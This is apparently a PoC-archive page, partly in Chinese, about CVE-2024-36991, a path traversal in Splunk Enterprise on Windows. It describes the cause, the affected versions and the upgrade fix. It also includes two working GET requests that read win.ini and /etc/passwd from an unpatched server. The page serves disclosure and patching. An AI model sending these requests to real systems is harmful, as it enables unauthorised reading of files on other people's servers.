关联漏洞
标题:
Splunk 安全漏洞
(CVE-2024-36991)
描述:Splunk是美国Splunk公司的一套数据收集分析软件。该软件主要用于收集、索引和分析及其所产生的数据,包括所有IT系统和基础结构(物理、虚拟机和云)生成的数据。 Splunk存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。
描述
Path Traversal On The "/Modules/Messaging/" Endpoint In Splunk Enterprise On Windows
介绍
# CVE-2024-36991
> Path Traversal On The “/Modules/Messaging/“ Endpoint In Splunk Enterprise On Windows
In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows.
The vulnerability exists because the Python os.path.join function removes the drive letter from path tokens if the drive in the token matches the drive in the built path.
This vulnerability should only affect Splunk Enterprise on Windows.
# POC
```
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
```
# Affected
affected from 9.2 before 9.2.2
affected from 9.1 before 9.1.5
affected from 9.0 before 9.0.10
# Solution
Upgrade Splunk Enterprise to versions 9.2.2, 9.1.5, and 9.0.10, or higher.
# Credits
Danylo Dmytriiev (DDV_UA)
# References
- https://advisory.splunk.com/advisories/SVD-2024-0711
- https://www.cve.org/CVERecord?id=CVE-2024-36991
文件快照
[4.0K] /data/pocs/23b32eb15bb06737429e7c1f69fb6d65dea7deee
├── [1.1K] LICENSE
└── [1.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。